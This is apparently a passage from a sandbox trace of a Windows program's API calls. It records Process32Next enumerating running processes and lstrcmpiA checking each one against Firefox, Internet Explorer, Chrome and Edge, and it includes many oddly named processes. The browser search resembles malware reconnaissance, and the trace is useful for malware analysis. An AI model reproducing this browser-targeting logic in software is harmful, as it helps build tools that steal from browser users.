lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.212] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.212] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.212] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.212] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.212] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.212] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.212] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.212] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.212] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.212] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.213] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.213] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.213] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.213] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.213] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0245.213] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0245.213] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0245.213] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0245.213] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.213] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.214] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.214] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.214] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.214] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.214] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.214] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.214] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.214] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.214] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.214] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0245.215] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0245.215] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0245.215] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0245.215] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.215] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0245.215] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0245.215] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0245.215] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0245.216] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.216] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.216] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0245.216] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0245.216] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0245.216] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.216] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.217] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.217] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.217] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.217] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.217] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0245.217] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0245.217] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0245.217] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0245.217] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.217] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0245.218] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0245.218] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0245.218] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0245.218] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.218] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0245.218] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0245.218] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0245.218] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0245.218] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.218] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0245.219] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0245.219] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0245.219] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0245.219] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.219] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0245.219] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0245.219] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0245.219] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0245.219] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.219] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0245.220] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0245.220] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0245.220] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0245.220] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.220] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0245.220] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0245.220] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0245.220] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0245.221] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.221] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0245.221] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0245.221] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0245.221] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0245.221] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.221] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0245.222] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0245.222] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0245.222] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0245.222] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.222] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0245.222] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0245.222] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0245.222] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0245.222] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.222] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0245.223] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0245.223] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0245.223] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0245.223] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.223] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0245.223] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0245.223] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0245.223] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0245.223] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.223] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0245.224] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0245.224] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0245.224] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0245.224] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.224] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0245.224] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0245.224] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0245.224] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0245.224] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.224] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0245.225] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0245.225] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0245.225] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0245.225] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.225] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0245.226] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0245.226] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0245.226] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0245.226] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.226] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0245.226] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0245.226] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0245.226] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0245.226] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.226] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0245.227] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0245.227] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0245.227] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0245.227] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.227] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0245.227] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0245.227] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0245.227] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0245.227] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.227] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0245.228] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0245.228] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0245.228] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0245.228] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.228] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0245.228] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0245.228] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0245.228] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0245.229] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.229] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0245.229] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0245.229] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0245.229] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0245.229] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.229] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.230] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0245.230] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0245.230] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0245.230] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.230] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.230] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.230] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.230] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.230] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.230] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0245.231] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0245.231] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0245.231] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0245.231] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.231] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0245.231] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0245.231] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0245.231] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0245.231] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.231] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0245.232] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0245.232] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0245.232] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0245.232] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.232] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0245.232] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0245.232] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0245.232] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0245.232] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0245.232] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0245.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0245.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0245.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0245.233] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.233] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0245.233] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0245.233] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0245.233] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0245.234] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0245.234] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 